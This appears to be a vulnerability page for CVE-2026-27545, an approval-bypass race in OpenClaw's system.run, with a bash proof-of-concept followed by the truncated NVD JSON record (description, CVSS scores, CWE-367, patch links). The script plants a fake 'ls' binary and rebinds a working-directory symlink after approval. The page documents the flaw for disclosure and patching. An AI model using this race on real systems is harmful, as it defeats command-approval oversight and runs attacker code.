CVE-2026-27545

#!/bin/bash # CVE-2026-27545 PoC - Symlink Rebinding Attack # Requirements: Write access to current working directory # Setup ATTACK_DIR="/tmp/attacker-controlled" TARGET_DIR="/tmp/victim" echo "=== CVE-2026-27545 Symlink Rebinding PoC ===" # Create attacker controlled directory with malicious binary mkdir -p "$ATTACK_DIR" cat > "$ATTACK_DIR/ls" << 'EOF' #!/bin/bash echo "[+] Malicious ls executed! Arbitrary code running as: $(whoami)" id # Replace with actual malicious payload EOF chmod +x "$ATTACK_DIR/ls" # Create legitimate directory structure mkdir -p "$TARGET_DIR/legitimate" cd "$TARGET_DIR" # Step 1: Create initial symlink (points to legitimate dir) ln -sfn "$TARGET_DIR/legitimate" current_workdir # Step 2: Race condition - rebind symlink after approval, before execution echo "[+] Waiting for approval..." echo "[!] Attack window: Rebind symlink immediately after approval" # Simulate approval delay, then rebind sleep 1 rm current_workdir ln -sfn "$ATTACK_DIR" current_workdir echo "[+] Symlink rebinded to: $(readlink current_workdir)" echo "[+] Working directory appears unchanged, but executing from attacker dir" # The vulnerable system.run will now execute attacker-controlled binary

{"cve": {"id": "CVE-2026-27545", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:23.837", "lastModified": "2026-03-18T19:51:34.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.26 contain an approval bypass vulnerability in system.run execution that allows attackers to execute commands from unintended filesystem locations by rebinding writable parent symlinks in the current working directory after approval. An attacker can modify mutable parent symlink path components between approval and execution time to redirect command execution to a different location while preserving the visible working directory string."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.26 contienen una vulnerabilidad de omisión de aprobación en la ejecución de system.run que permite a los atacantes ejecutar comandos desde ubicaciones de sistema de archivos no intencionadas al reasignar symlinks padre escribibles en el directorio de trabajo actual después de la aprobación. Un atacante puede modificar componentes de ruta de symlink padre mutables entre el tiempo de aprobación y ejecución para redirigir la ejecución de comandos a una ubicación diferente mientras se preserva la cadena del directorio de trabajo visible."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.26", "matchCriteriaId": "2AB7D7E0-2F21-4EC6-A3D5-F53A644120E4"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/4b4718c8dfce2e2c48404aa5088af7c013bed60b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/4e690e09c746408b5e27617a20cb3fdc5190dbda", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/78a7ff2d50fb3bcef351571cb5a0f21430a340c1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/d06632ba45a8482192792c55d5ff0b2e21abb0a7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/d82c042b09727a6148f3ca651b254c4a677aff26", "source": "[email protected]", ... (truncated)